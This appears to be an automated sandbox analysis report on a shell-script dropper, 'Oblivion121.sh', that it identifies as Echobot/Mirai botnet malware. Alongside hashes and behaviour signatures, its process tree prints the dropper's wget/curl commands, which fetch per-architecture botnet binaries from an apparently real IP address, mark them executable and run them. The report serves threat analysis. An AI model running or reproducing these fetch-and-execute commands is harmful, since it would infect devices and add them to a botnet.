Overview

overview

10

Static

static

1

Oblivion121.sh

ubuntu-18.04-amd64

10

Oblivion121.sh

debian-9-armhf

10

Oblivion121.sh

debian-9-mips

10

Oblivion121.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    122s
  • max time network
    151s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    29/03/2025, 15:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Oblivion121.sh

  • Size

    1KB

  • MD5

    506ea803fdb2d5a593683fe98fec6f1f

  • SHA1

    f71d6ccbfd48bff6ba7c06a7250e137f5ab75066

  • SHA256

    71451b64fc1acf7e50295e14859f7957966210efb8351a26882f96781aa7c4e1

  • SHA512

    213cf82427a6b073293b65f0745fa5bc95e24c7f684aec2f97b7548d4d099c0a0251f691d4a514818da6ad5b6674c55549eaa960a7ac7e2d28ee391d9d626fc5

Score
10/10
echobotmiraibotnetdefense_evasiondiscoverytrojan

Malware Config

Signatures

  • Detected Echobot 3 IoCs
  • Echobot

    An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.

    botnettrojanechobot
  • Echobot family
    echobot
  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (116052) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 16 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 8 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Changes its process name 8 IoCs
  • Reads system network configuration 1 TTPs 8 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Oblivion121.sh
    /tmp/Oblivion121.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:712
    • /usr/bin/wget
      wget http://176.65.144.18/bins/jade420.x86
      2⤵
      • Writes file to tmp directory
      PID:715
    • /usr/bin/curl
      curl -O http://176.65.144.18/bins/jade420.x86
      2⤵
      • Writes file to tmp directory
      PID:733
    • /bin/cat
      cat jade420.x86
      2⤵
        PID:740
      • /bin/chmod
        chmod +x cp jade420.x86 Oblivion121.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-wm67od
        2⤵
        • File and Directory Permissions Modification
        PID:741
      • /tmp/cp
        ./cp x86
        2⤵
          PID:742
        • /usr/bin/wget
          wget http://176.65.144.18/bins/jade420.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:745
        • /usr/bin/curl
          curl -O http://176.65.144.18/bins/jade420.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:746
        • /bin/cat
          cat jade420.mips
          2⤵
          • System Network Configuration Discovery
          PID:747
        • /bin/chmod
          chmod +x cp jade420.mips jade420.x86 Oblivion121.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-wm67od
          2⤵
          • File and Directory Permissions Modification
          PID:748
        • /tmp/cp
          ./cp mips
          2⤵
          • System Network Configuration Discovery
          PID:749
        • /usr/bin/wget
          wget http://176.65.144.18/bins/jade420.mpsl
          2⤵
          • Writes file to tmp directory
          PID:751
        • /usr/bin/curl
          curl -O http://176.65.144.18/bins/jade420.mpsl
          2⤵
          • Writes file to tmp directory
          PID:752
        • /bin/cat
          cat jade420.mpsl
          2⤵
            PID:767
          • /bin/chmod
            chmod +x cp jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-wm67od
            2⤵
            • File and Directory Permissions Modification
            PID:768
          • /tmp/cp
            ./cp mpsl
            2⤵
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:769
          • /usr/bin/wget
            wget http://176.65.144.18/bins/jade420.arm4
            2⤵
              PID:774
            • /usr/bin/curl
              curl -O http://176.65.144.18/bins/jade420.arm4
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:785
            • /bin/chmod
              chmod +x cp jade420.arm4 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-wm67od
              2⤵
              • File and Directory Permissions Modification
              PID:795
            • /tmp/cp
              ./cp arm4
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:797
            • /usr/bin/wget
              wget http://176.65.144.18/bins/jade420.arm5
              2⤵
              • Writes file to tmp directory
              PID:828
            • /usr/bin/curl
              curl -O http://176.65.144.18/bins/jade420.arm5
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:830
            • /bin/chmod
              chmod +x cp jade420.arm4 jade420.arm5 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-wm67od
              2⤵
              • File and Directory Permissions Modification
              PID:832
            • /tmp/cp
              ./cp arm5
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:833
            • /usr/bin/wget
              wget http://176.65.144.18/bins/jade420.arm6
              2⤵
              • Writes file to tmp directory
              PID:876
            • /usr/bin/curl
              curl -O http://176.65.144.18/bins/jade420.arm6
              2⤵
              • Writes file to tmp directory
              PID:877
            • /bin/chmod
              chmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh
              2⤵
              • File and Directory Permissions Modification
              PID:879
            • /tmp/cp
              ./cp arm6
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:880
            • /usr/bin/wget
              wget http://176.65.144.18/bins/jade420.arm7
              2⤵
              • Writes file to tmp directory
              PID:884
            • /usr/bin/curl
              curl -O http://176.65.144.18/bins/jade420.arm7
              2⤵
              • Writes file to tmp directory
              PID:891
            • /bin/chmod
              chmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh
              2⤵
              • File and Directory Permissions Modification
              PID:893
            • /tmp/cp
              ./cp arm7
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:894
            • /usr/bin/wget
              wget http://176.65.144.18/bins/jade420.ppc
              2⤵
              • Writes file to tmp directory
              PID:900
            • /usr/bin/curl
              curl -O http://176.65.144.18/bins/jade420.ppc
              2⤵
              • Writes file to tmp directory
              PID:907
            • /bin/chmod
              chmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.mips jade420.mpsl jade420.ppc jade420.x86 Oblivion121.sh
              2⤵
              • File and Directory Permissions Modification
              PID:909
            • /tmp/cp
              ./cp ppc
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:910
            • /usr/bin/wget
              wget http://176.65.144.18/bins/jade420.m68k
              2⤵
              • Writes file to tmp directory
              PID:914
            • /usr/bin/curl
              curl -O http://176.65.144.18/bins/jade420.m68k
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:921
            • /bin/chmod
              chmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.m68k jade420.mips jade420.mpsl jade420.ppc jade420.x86 Oblivion121.sh
              2⤵
              • File and Directory Permissions Modification
              PID:923
            • /tmp/cp
              ./cp m68k
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:924
            • /usr/bin/wget
              wget http://176.65.144.18/bins/jade420.sh4
              2⤵
              • Writes file to tmp directory
              PID:928
            • /usr/bin/curl
              curl -O http://176.65.144.18/bins/jade420.sh4
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:935
            • /bin/chmod
              chmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.m68k jade420.mips jade420.mpsl jade420.ppc jade420.sh4 jade420.x86 Oblivion121.sh
              2⤵
              • File and Directory Permissions Modification
              PID:937
            • /tmp/cp
              ./cp sh4
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:938

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • /tmp/cp
            Filesize

            95KB

            MD5

            3d2c880e79089241c8fbb272ee31060b

            SHA1

            23233e3043dc70c1e21e352f99bdcfc70a233dcd

            SHA256

            7961cf5c0d14018d558bdb82ee0f4bb07967e1fd671444dd708ed782fdda54e4

            SHA512

            1246ed2d4bdfe5f43f6f6ea13704d9a5c59c70d446b16be55103de187e2a97912e89ff1ff44553b900fba08e977309f2804af47a0afc6120555fe04afd5718e3

            Download Submit

          • /tmp/cp
            Filesize

            99KB

            MD5

            6f5fba17cf8cff755d5d8c512df7ac69

            SHA1

            13808a7c0b1b1ee0f8e87030861727235b22ba4f

            SHA256

            b830cebb06671935a97e8dde66857eef6343fd20fa44c3e9af3d73b26d3eedc7

            SHA512

            d3dc9cdfb5033016847a9a285c845fd3697ce6498a175ad834c22ee4b70d13065a6d9dbacd794b2a3490dcccfdfae414174842c57c65ed29cc561f4cae988431

            Download Submit

          • /tmp/jade420.x86
            Filesize

            68KB

            MD5

            ca9c4fc72ea948856f5a37956f167bfc

            SHA1

            a689a0fc903757672b777dda4f82a8688556d333

            SHA256

            96f4ce7b2e797678dab4ccafd828ace3718b945bfe8a05357688a5cd2d166fc4

            SHA512

            900e34ae8667a6cea737e5a16c3143d9ab8e20a3f466bc6b616bf47fc961809bfd3ffcdc938c0941c4209ac3ed4af2066d82942dd45e05f78199e87d9a87ddf2

            Download Submit